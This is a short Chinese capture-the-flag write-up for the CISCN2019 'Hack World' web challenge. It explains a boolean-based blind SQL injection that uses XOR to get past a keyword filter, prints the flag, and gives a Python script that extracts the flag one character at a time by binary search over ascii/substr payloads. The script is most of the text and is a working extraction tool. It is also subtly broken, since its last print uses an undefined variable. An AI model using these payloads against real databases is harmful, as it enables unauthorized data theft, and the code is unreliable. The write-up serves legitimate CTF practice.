[CISCN2019 华北赛区 Day2 Web1]Hack World 1

[CISCN2019 华北赛区 Day2 Web1]Hack World 1

打开实例发现是个POST注入框

盲猜SQL注入，万能密码检测无果，而且经过测试存在大量sql关键字过滤

尝试使用(),出现了bool(false)，确定这是一道布尔注入题

and被禁用，决定采用异或^注入

构建payload脚本梭哈：

成功获得flag：

flag{a2f7089d-bd8c-4659-bcd6-9c3b3e4780dc}

附脚本：

import requests
import time

def jiaoben(url, field_length=50, request_interval=0.01):
    result = ''
    for i in range(1, field_length + 1):
        max_val = 127
        min_val = 0
        while (max_val - min_val) > 1:
            mid_val = (max_val + min_val) // 2
            payload = f'1^(ascii(substr((select(flag)from(flag)),{i},1))>{mid_val})=1'
            response = requests.post(url, data={'id': payload})
            if 'Hello' in response.text:
                max_val = mid_val
            else:
                min_val = mid_val
            time.sleep(request_interval)
        result += chr(max_val)
        print(result)  # 实时打印当前猜测的字段值
    print(f"Final result for {field_name}: {result}")
    return result

url = ''
jiaoben(url)